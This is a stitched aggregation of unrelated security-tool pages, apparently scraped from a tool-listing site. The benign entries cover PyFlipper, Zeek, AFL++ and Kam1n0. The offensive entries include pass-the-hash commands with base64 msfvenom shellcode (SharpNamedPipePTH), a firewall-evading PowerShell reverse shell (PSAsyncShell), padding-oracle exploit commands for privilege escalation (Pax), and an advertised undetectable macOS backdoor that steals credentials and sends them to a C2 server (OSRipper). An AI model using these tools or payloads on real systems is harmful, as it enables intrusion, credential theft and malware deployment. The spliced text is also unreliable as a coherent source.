device_info = flipper.device_info.info()

#Get heap info dict
heap = flipper.free.info()

#Get free_blocks string
free_blocks = flipper.free.blocks()

#Get bluetooth info
bt_info = flipper.bt.info()

Storage

Filesystem Info

#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")

Explorer

#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")

#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")

#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")

#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")

Files

#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")

#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")

#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")

#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")

#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")

#Write file in one chunk
file = "/ext/bar.txt"

text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.file(file, text)

#Write file using a listener
import time

file = "/ext/foo.txt"

text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.start(file)

time.sleep(2)

flipper.storage.write.send(text_one)

text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)

time.sleep(3)

#Don't forget to stop
flipper.storage.write.stop()

LED/Backlight

#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)

#Set blue led off
flipper.led.blue(value=0)

#Set green led value
flipper.led.green(value=175)

#Set backlight on
flipper.led.backlight_on()

#Set backlight off
flipper.led.backlight_off()

#Turn off led
flipper.led.off()

Vibro

#Set vibro True or False
flipper.vibro.set(True)

#Set vibro on
flipper.vibro.on()

#Set vibro off
flipper.vibro.off()

GPIO

#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)

#Set gpio pin value
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

MusicPlayer

#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"

#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)

#Stop loop
flipper.music_player.stop()

#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)

#Beep
flipper.music_player.beep()

#Beep for 5 seconds
flipper.music_player.beep(duration=5)

NFC

#Synchronous default timeout 5 seconds

#Detect NFC
nfc_detected = flipper.nfc.detect()

#Emulate NFC
flipper.nfc.emulate()

#Activate field
flipper.nfc.field()

RFID

#Synchronous default timeout 5 seconds

#Read RFID
rfid = flipper.rfid.read()

SubGhz

#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)

#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")

Infrared

#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")

#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])

#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)

IKEY

#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()

#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

Log

#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()

Debug

#Activate debug mode
flipper.debug.on()

#Deactivate debug mode
flipper.debug.off()

Onewire

#Search
response = flipper.onewire.search()

I2C

#Get
response = flipper.i2c.get()

Input

#Input dump
dump = flipper.input.dump()

#Send input
flipper.input.send("up", "press")
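
Putting it together, the following minimal session sketch combines calls documented above; the serial port path is only an assumption for a typical local setup:

from pyflipper import PyFlipper

# Assumed local serial port; adjust for your setup
flipper = PyFlipper(com="/dev/ttyACM0")

# Basic device overview (dicts, as documented above)
device_info = flipper.device_info.info()
power_info = flipper.power.info()

# List what is stored on the SD card
ext_list = flipper.storage.list(path="/ext")

print(device_info)
print(power_info)
print(ext_list)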

Optimizations

Feel free to contribute in any way

  • Queue Thread orchestrator (check dev branch)
  • Implement all the cli functions
  • Async SubGhz Chat (check dev branch)

License

MIT

Buy me a pint

ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7

ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54

BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat

Contacts

  • Discord: white_rabbit#4124
  • Twitter: @nic_whr
  • GPG: 0x94EDEADC


OpenStego Free Steganography Solution 0.8.5

OpenStego is a tool implemented in Java for generic steganography, with support for password-based encryption of the data. It supports plugins for various steganographic algorithms (currently, only Least Significant Bit algorithm is supported for images).

GNUnet P2P Framework 0.17.6

GNUnet is a peer-to-peer framework with focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service build on top of the framework is anonymous file sharing.

SharpNamedPipePTH - Pass The Hash To A Named Pipe For Token Impersonation


This project is a C# tool that uses Pass-the-Hash for authentication on a local named pipe for user impersonation. You need local administrator or SeImpersonate rights to use it. There is a blog post explaining the technique:

https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/

It is heavily based on the code from the project Sharp-SMBExec.

I faced certain offensive security project situations in the past where I already had the NTLM hash of a low privileged user account and needed a shell for that user on the currently compromised system - but that was not possible with the public tools available. Imagine two more facts for a situation like that - the NTLM hash could not be cracked, and there was no process of the victim user to execute shellcode in or to migrate into. This may sound like an absurd edge case to some of you, but I experienced it multiple times, and in more than one engagement I spent a lot of time searching for the right tool/technique for that specific situation.

My personal goals for a tool/technique were:

  • Fully featured shell or C2-connection as the victim user-account
  • It must also be able to impersonate low privileged accounts - depending on the engagement goals it might be necessary to access a system as a specific user such as the CEO, HR accounts, SAP administrators or others
  • The tool can be used as C2-module

Unfortunately the impersonated user has no network authentication allowed, as the new process uses an impersonation token, which is restricted. So you can only use this technique for local actions as another user.

There are two ways to use SharpNamedPipePTH. Either you can execute a binary (with or without arguments):

SharpNamedPipePTH.exe username:testing hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:C:\windows\system32\cmd.exe

SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" arguments:"-nop -w 1 -sta -enc bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA"

Or you can execute shellcode as the other user:

SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 shellcode:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY21kLmV4ZQA=

Which is the output of msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread | base64 -w0.

I'm not happy with the shellcode execution yet, as it currently spawns notepad as the impersonated user and injects shellcode into that new process via a D/Invoke CreateRemoteThread syscall. I'm still looking for a way to spawn a process in the background or execute shellcode without needing a process of the target user for memory allocation.



PSAsyncShell - PowerShell Asynchronous TCP Reverse Shell


PSAsyncShell is an Asynchronous TCP Reverse Shell written in pure PowerShell.

Unlike other reverse shells, all the communication and execution flow is done asynchronously, making it possible to bypass some firewalls and some countermeasures against this kind of remote connection.

Additionally, this tool features command history, screen wiping, file uploading and downloading, information splitting through chunks and reverse Base64 URL encoded traffic.
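
As a rough illustration only (a Python toy sketch of the idea, not PSAsyncShell's actual wire format), splitting information into chunks with reversed, Base64 URL encoded traffic could look like this:

import base64

def encode_for_transport(data, chunk_size=64):
    # Reverse the payload bytes, Base64 URL-encode them,
    # then split the encoded string into fixed-size chunks.
    encoded = base64.urlsafe_b64encode(data[::-1]).decode()
    return [encoded[i:i + chunk_size] for i in range(0, len(encoded), chunk_size)]

def decode_from_transport(chunks):
    # Join the chunks, decode, and reverse back to the original bytes.
    return base64.urlsafe_b64decode("".join(chunks))[::-1]

chunks = encode_for_transport(b"whoami")
assert decode_from_transport(chunks) == b"whoami"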


Requirements

  • PowerShell 4.0 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/PSAsyncShell

Usage

.\PSAsyncShell.ps1 -h

____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/

---------------------- by @JoelGMSec -----------------------

Info: This tool helps you to get a remote shell
over asynchronous TCP to bypass firewalls

Usage: .\PSAsyncShell.ps1 -s -p listen_port
Listen for a new connection from the client

.\PSAsyncShell.ps1 -c server_ip server_port
Connect the client to a PSAsyncShell server

Warning: All info between parts will be sent unencrypted
Download & Upload functions don't use MultiPart

The detailed guide of use can be found at the following link:

https://darkbyte.net/psasyncshell-bypasseando-firewalls-con-una-shell-tcp-asincrona

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gรกmez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



Pax - CLI Tool For PKCS7 Padding Oracle Attacks


Exploit padding oracles for fun and profit!

Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:

  1. Obtain plaintext for a given piece of CBC encrypted data.
  2. Obtain encrypted bytes for a given piece of plaintext, using the unknown encryption algorithm used by the oracle.

This can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.

As always, this tool should only be used on systems you own and/or have permission to probe!
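
For background, the core decryption step of a CBC padding oracle attack (the class of attack Pax automates) can be sketched in a few lines of Python. This is a simplified illustration rather than Pax's implementation; oracle is a hypothetical callback that returns True when the target accepts the padding of the supplied ciphertext:

# Recover the plaintext of a single CBC block using a padding oracle.
# prev_block is the ciphertext block (or IV) that precedes block.
def decrypt_block(prev_block, block, oracle, block_size=16):
    intermediate = bytearray(block_size)
    for pad in range(1, block_size + 1):          # target padding value 0x01..0x10
        pos = block_size - pad
        for guess in range(256):
            forged = bytearray(block_size)
            forged[pos] = guess
            # Force the already-recovered tail bytes to decrypt to the padding value.
            for i in range(pos + 1, block_size):
                forged[i] = intermediate[i] ^ pad
            if oracle(bytes(forged) + block):
                intermediate[pos] = guess ^ pad
                break
    # XOR the recovered intermediate state with the real previous block.
    return bytes(i ^ p for i, p in zip(intermediate, prev_block))

A real attack repeats this for every block, strips the PKCS7 padding at the end, and also handles the rare false positive that can occur while recovering the last byte.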


Installation

Download from releases, or install with Go:

go get -u github.com/liamg/pax/cmd/pax

Example Usage

If you find a suspected oracle, where the encrypted data is stored inside a cookie named SESS, you can use the following:

pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

This will hopefully give you some plaintext, perhaps something like:

 {"user_id": 456, "is_admin": false}

It looks like you could elevate your privileges here!

You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:

pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

This will spit out another base64 encoded set of encrypted data, perhaps something like:

dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.

How does this work?

The following are great guides on how this attack works:



SCodeScanner - Stands For Source Code Scanner Where The User Can Scan The Source Code For Finding Critical Vulnerabilities


SCodeScanner stands for Source Code Scanner: it lets the user scan source code to find critical vulnerabilities. The main objective of this scanner is to find vulnerabilities in the source code before the code gets published to production.


Features

  1. Supports the PHP language
  2. Supports the YAML language
  3. Passes results to bug-tracking services like Jira and also to Slack (sending files to a group of multiple people at once).
  4. Gives results in JSON format, which can easily be consumed by any other program.
  5. Works with rules. You only need to create a rule when the desired rule is not already present in the php/yaml directory.
  6. Rules can scan advanced patterns

Achievements

SCodeScanner received 5 CVEs for finding vulnerabilities in multiple CMS plugins.

  • CVE-2022-1465
  • CVE-2022-1474
  • CVE-2022-1527
  • CVE-2022-1532
  • CVE-2022-1604

How to run?

  • Download the repository -
  • Run pip3 install -r requirements.txt
  • And run python3 scscanner.py --help

Feedback/Improvements

I would love to hear your feedback on this tool. Open an issue if you find any problems, and open a PR if you have something to contribute.

Contact

Utkarsh Agrawal
Website



OSRipper - AV Evading OSX Backdoor And Crypter Framework


OSRipper is a fully undetectable backdoor generator and crypter which specialises in macOS M1 malware. It will also work on Windows, but for now there is no support for it and it IS NOT FUD for Windows (yet, at least); for now I will not focus on Windows.

You can also PM me on Discord (SubGlitch1#2983) for support or to ask for new features.


Features

  • FUD (for macOS)
  • Cloaks itself as an official app (Microsoft, ExpressVPN, etc.)
  • Dumps sys info, browser history, logins, ssh/aws/azure/gcloud creds, clipboard content, local users, etc. (more in Cedric Owens' SwiftBelt)
  • Encrypted communications
  • Rootkit-like Behaviour
  • Every Backdoor generated is entirely unique

Description

Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

https://github.com/SubGlitch1/OSRipper/wiki

Here are example backdoors which were generated with OSRipper




macOS .apps will look like this on VT

Getting Started

Dependencies

You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.

Since version 1.4 you will need Metasploit installed and on PATH so that it can handle the meterpreter listeners.

Installing

Linux

apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

Windows

git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3

Executing program

Only this

sudo python3 main.py

Contributing

Please feel free to fork and open pull requests. Suggestions/criticism are appreciated as well.

Roadmap

v0.1

  • โœ…Get down detection to 0/26 on antiscan.me
  • โœ…Add Changelog
  • โœ…Daemonise Backdoor
  • โœ…Add Crypter
  • โœ…Add More Backdoor templates
  • โœ…Get down detection to at least 0/68 on VT (for mac malware)

v0.2

  • โœ…Add AntiVM
  • [] Implement tor hidden services
  • โœ…Add Logger
  • โœ…Add Password stealer
  • [] Add KeyLogger
  • โœ…Add some new evasion options
  • โœ…Add SilentMiner
  • [] Make proper C2 server

v0.3

Coming soon

Help

Just open an issue and I'll make sure to get back to you

Changelog

  • 0.2.1

    • OSRipper will now pull all information from the target and send it to the C2 server over sockets. This includes information like browser history, passwords, system information, keys, etc.
  • 0.1.6

    • Process will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared
  • 0.1.5

    • Added Crypter
  • 0.1.4

    • Added 4th Module
  • 0.1.3

    • Got detection on VT down to 0. Made the process invisible
  • 0.1.2

    • Added 3rd module and listener
  • 0.1.1

    • Initial Release

License

MIT

Acknowledgments

Inspiration, code snippets, etc.

Support

I am very sorry to even write this here, but my finances are not looking good right now. If you appreciate my work I would really be happy about any donation. You do NOT have to; this is solely optional.

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T

Disclaimer

I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.



American Fuzzy Lop plus plus 4.03c

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy


Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.

The advantage of grabbing syscalls dynamically is that the signatures of the stubs are not included in the file, and you don't have to worry about changing Windows versions.

To compile the shellcode execution template run the following:

nim c -d:release ShellcodeInject.nim

The result should look like this:



Zeek 5.0.2

Zeek is a powerful network analysis framework that is much different from the typical IDS you may know. While focusing on network security monitoring, Zeek provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Zeek has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyber-infrastructure. Zeek's user community includes major universities, research labs, supercomputing centers, and open-science communities. This is the source code release.

Kam1n0 - Assembly Analysis Platform


Kam1n0 v2.x is a scalable assembly management and analysis platform. It allows a user to first index a (large) collection of binaries into different repositories and provide different analytic services such as clone search and classification. It supports multi-tenancy access and management of assembly repositories by using the concept of Application. An application instance contains its own exclusive repository and provides a specialized analytic service. Considering the versatility of reverse engineering tasks, Kam1n0 v2.x server currently provides three different types of clone-search applications: Asm-Clone, Sym1n0, and Asm2Vec, and an executable classification based on Asm2Vec. New application type can be further added to the platform.


A user can create multiple application instances. An application instance can be shared among a specific group of users. The application repository read-write access and on-off status can be controlled by the application owner. Kam1n0 v2.x server can serve the applications concurrently using several shared resource pools.

Kam1n0 was developed by Steven H. H. Ding and Miles Q. Li under the supervision of Benjamin C. M. Fung of the Data Mining and Security Lab at McGill University in Canada. It won the second prize at the Hex-Rays Plug-In Contest 2015. If you find Kam1n0 useful, please cite our paper:

  • S. H. H. Ding, B. C. M. Fung, and P. Charland. Kam1n0: MapReduce-based Assembly Clone Search for Reverse Engineering. In Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (SIGKDD), pages 461-470, San Francisco, CA: ACM Press, August 2016.

  • S. H. H. Ding, B. C. M. Fung, and P. Charland. Asm2Vec: boosting static representation robustness for binary clone search against code obfuscation and compiler optimization. In Proceedings of the 40th IEEE Symposium on Security and Privacy (S&P), 18 pages, San Francisco, CA: IEEE Computer Society, May 2019.

Asm-Clone

Asm-Clone applications try to solve the efficient subgraph search problem (i.e. graph isomorphism problem) for assembly functions (<1.3s average query time and <30ms average index time with 2.3M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below).

  • Application Type: Asm-Clone
  • The original clone search service used in Kam1n0 v1.x.
  • Currently support Meta-PC, ARM, PowerPC, and TMS320c6 (experimental).
  • Support subgraph clone search within a certain assembly code family.
    • + Good interpretability of the result: breaks down to subgraphs.
    • + Accurate for searching within the given code family.
    • + Good for differing various patches or versions for big binaries.
    • - Relatively more sensitive to instruction set changes, optimizations, and obfuscation.
    • - Need to pre-define the syntax of the assembly code language.
    • - Need to have assembly code of the same chosen family in the repository.


Sym1n0

Semantic clone search by differentiated fuzz testing and constraint solving. An efficient and scalable dynamic-static hybrid approach (<1s average query time and <100ms average index time with 1.5M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below). Support visualization of abstract syntax graph.

  • Application Type: Sym1n0 (v2 only)
  • Clone search by both symbolic execution and concrete execution.
  • Differentiate functions based on their different I/O behavior.
  • Clone search conducted on the abstract syntax graph constructed from Vex IR (powered by LibVex).
    • + Clone search across different assembly code families.
      • For example, indexed x86 binaries but the query is ARM code.
    • + Subgraph clone search.
    • + Support a wide range of families through LibVex.
      • x86, AMD64, MIPS32, MIPS64, PowerPC32, PowerPC64, ARM32, and ARM64.
    • + An efficient dynamic-static hybrid approach.
    • + Ideal for analyzing firmware compiled for different processors.
    • - Sensitive to heavy graph manipulation (such as a full flattening).
    • - Sensitive to large scale breakdown of basic block integrity.


Asm2Vec

Asm2Vec leverages representation learning. It understands the lexical semantic relationship of assembly code. For example, xmm* registers are semantically related to vector operations such as addps. memcpy is similar to strcpy. The graph below shows different assembly functions compiled from the same source code of gmpz_tdiv_r_2exp in libgmp. From left to right, the assembly functions are compiled with the GCC O0 option, the GCC O3 option, the O-LLVM obfuscator Control Flow Graph Flattening option, and the LLVM obfuscator Bogus Control Flow Graph option. Asm2Vec can statically identify them as clones.

  • Leverage representation learning.
  • Understand the lexical semantic relationship of assembly code.
    • + State-of-the-art for clone search against heavy code obfuscation techniques.
      • (>0.8 accuracy for all options applied in O-LLVM, multiple iterations).
    • + State-of-the-art for clone search against code optimization.
      • (>0.8 accuracy between O0 and O3, >0.94 accuracy between O2 and O3)
    • + Even better result than the most recent dynamic approach.
    • + Much more efficient than recent dynamic approaches.
    • + Do not need to define the architecture. It self-learns by reading a large volume of code.
    • + Static approach: efficient and scalable.
    • - No subgraphs.
    • - Assumes the assembly code comes from the same processor family.
    • - Static approach: cannot recognize jump tables, etc.


Executable Classification

In this application, the user defines a set of software classes which are based on functional relatedness and provides binaries belonging to each class. Then the system automatically groups functions into clusters in which functions are connected directly or indirectly by clone relations. The clusters that are discriminative for the classification are kept and serve as signatures of their classes. Given a target binary, the system shows the degree to which it belongs to each software class.


  • Use Asm2Vec as its function similarity computation model

    • + Provide interpretable classification results.
    • + Learn common characteristics (i.e., function clusters) of each class.
    • + Able to handle smaller and imbalanced datasets than an ordinary machine learning model.
    • - The limitation is that the assumption that binaries in the same class share some common functions must hold for the system to work.


Platform Overview

The figure below shows the major UI components and functionalities of Kam1n0 v2.x. We adopt a material design. In general, each user has an application list, a running-job list, and a result file list.

  • Application list shows the application instances owned by the user and shared by the others.
  • Running-job list shows the running progress for a large query (such as chrome.dll) and indexing procedure.
  • Result file list displays the saved results. More details of the UI design can be found in our detailed tutorial.


Installation Instruction

The current release of Kam1n0 consists of two installers: the core server and IDA Pro plug-in.

Kam1n0-Server.msi includes:
  • Core engine - Main engine providing the service for indexing and searching.
  • Workbench - A user interface to manage the repositories and the running service.
  • Web user interface - Web user interface for searching/indexing binary files and assembly functions.
  • Visual C++ redistributable for VS 15 - Dependency for z3.

Kam1n0-IDA-Plugin.msi includes:
  • Plug-in - Connectors and user interface.
  • PyPI wheels for Cefpython - Rendering engine for the user interface.
  • PyPI and dependent wheels - Package management for Python. Included for IDA 6.8 & 6.9.

Installing the Kam1n0 Server

The Kam1n0 core engine is purely written in Java. You need the following dependencies:

  • [Required] The latest x64 11.x JRE/JDK distribution from Oracle.
  • [Optional] The latest version of IDA Pro with the idapython plug-in installed. The Python plug-in and runtime should have already been installed with IDA Pro. Reinstall IDA Pro if necessary.

Download the Kam1n0-Server.msi file from our release page. Follow the instructions to install the server. You will be prompted to select an installation path. IDA Pro is optional if the server does not have to deal with any disassembling. In other words, the client side uses the Kam1n0 plugin for IDA Pro. It is strongly suggested to have the IDA Pro installed with the Kam1n0 server. Kam1n0 server will automatically detect your IDA Pro by looking for the default application that you used to open .i64 file.

Installing the IDA Pro Plug-in

The Kam1n0 IDA Pro plug-in is written in Python for the logic and in HTML/JavaScript for the rendering. The following dependencies are required for its installation:

  • [Required] IDA Pro (>6.7) with the idapython plug-in installed. The Python plug-in and runtime should have already been installed with IDA Pro. Reinstall IDA Pro if necessary.

Next, download the Kam1n0-IDA-Plugin.msi installer from our release page. Follow the instructions to install the plug-in and runtime. Please note that the plug-in has to be installed in the IDA Pro plugins folder which is located at $IDA_PRO_PATH$/plugins. For example, on Windows, the path could be C:/Program Files (x86)/IDA 6.95/plugins. The installer will detect and validate the path.

Setting Up Kam1n0 on Ubuntu/Debian-based systems

  • Ensure you have the Oracle version of Java 11. (Not default-jdk in apt.)

    • Add Oracle's PPA and then update your package repository: sudo add-apt-repository ppa:webupd8team/java
      • If you encounter any errors (such as webupd8team not found) and you are behind a proxy, make sure you set and export your http_proxy and https_proxy environment variables, then try again with the -E option on sudo. Additionally, if you get an 'add-apt-repository command not found' error, try: sudo apt install -y software-properties-common.
    • Afterwards: sudo apt-get update, and sudo apt-get install oracle-java8-installer
      • Verify your Java version with java -version; you may need to manually set the JAVA_HOME environment variable (in /etc/environment), JAVA_HOME=/usr/lib/jvm/java-11-oracle
  • Download the latest release for Linux (Kam1n0-IDA-Plugin.tar.gz and Kam1n0-Server.tar.gz) from Kam1n0-Community.

  • Extract the two tarballs (i.e. tar -xvzf Kam1n0-IDA-Plugin.tar.gz and tar -xvzf Kam1n0-Server.tar.gz)

  • The Kam1n0-Server.tar.gz file will create the server directory.

  • Inside the server directory, you should see a file called kam1n0.properties, which is where you will set various configurations for kam1n0; this is very important.

  • Set kam1n0.data.path to where you would like your kam1n0-related data to be written. We choose to put it in the same place that we keep our server. kam1n0.ida.home refers to where your IDA installation is located. Comment out this line (and kam1n0.ida.batch, the line following it) if you do not have IDA and don't plan to use kam1n0 for disassembly. For more (accurate) information about the kam1n0.properties file, see the kam1n0.properties.explained file. A minimal sketch of the file is shown after this list.

  • Run kam1n0-server-workbench: java -jar kam1n0-server-workbench.jar. This should cause a window to pop up, which prompts you to actually start kam1n0. Alternatively, run kam1n0-server: java -jar kam1n0-server.jar --start. This starts the server from the console without a window.

  • To connect and use it, go to 127.0.0.1:8571 (the default port kam1n0 listens on should be 8571, but can be changed in kam1n0.properties) in your browser. You should see the pretty kam1n0 web UI. From there, follow the tutorial on the Kam1n0-Community repo if you do not know how to use kam1n0.
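
A minimal sketch of kam1n0.properties, assuming the installation layout described above (the paths are placeholders, only the keys mentioned in this guide are shown, and the full set of keys is documented in kam1n0.properties.explained):

# Where kam1n0 writes repositories and other data (placeholder path)
kam1n0.data.path = /home/user/kam1n0-data
# Location of the local IDA Pro installation (placeholder path);
# comment out this line and kam1n0.ida.batch below if IDA is not installed
kam1n0.ida.home = /opt/idapro
# kam1n0.ida.batch = ... (see kam1n0.properties.explained for its value)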

Backward Compatibility

The assembly code repositories and configuration files used in previous versions (<2.0.0) are no longer supported by the latest version. Please contact us if you need to migrate your old repositories.

Documentation

Development

Clone the latest stable branch (don't forget --recursive!):

git clone --recursive -b master2.x --single-branch https://github.com/McGill-DMaS/Kam1n0-Community

Importing the project.

IntelliJ: Import the root /kam1n0/kam1n0/ as a maven project. All the submodules will be loaded accordingly. EclipseEE: Add the cloned git repository to the git view. Import all maven projects from the git repository. You may need to modify the classpath to address any errors. All the resource paths are dynamically modified when running inside an IDE (through the kam1n0-resources submodule).

To build the project:

cd /kam1n0/kam1n0
mvn -DskipTests clean package
mvn -DskipTests package

The resulting binaries can be found in /kam1n0/build-bins/

To run the test code, you will need to first download chromedriver.exe from http://chromedriver.chromium.org/ and add its absolute path into an environment variable named webdriver.chrome.driver. It is also required that there is a chrome browser installed in the system. The test code will launch a browser instance to test the UI interfaces. The complete testing procedure will take approximately 3 hours.

cd /kam1n0/kam1n0
mvn -DskipTests clean package # you can skip this one if you already built the package
mvn -DskipTests package # you can skip this one if you already built the package
mvn -DforkMode=never test

These commands only compile the Java code, using pre-compiled wheels of libvex and z3, so they work out of the box. The build of libvex and z3 itself is platform-dependent; we use a fork of libvex from Angr. More complete build scripts as well as installers for Windows/Linux can be found under /kam1n0-builds/

  • kam1n0: The server's source code.
  • kam1n0-builds: Installer source code and scripts to build the distribution.
  • kam1n0-clients: The clients' source code.

Binary Releases

We have a Jenkins server for continuous development and delivery. The latest stable release will be posted here. Periodically we will synchronize our internal experimental branch with this repository.

Licensing

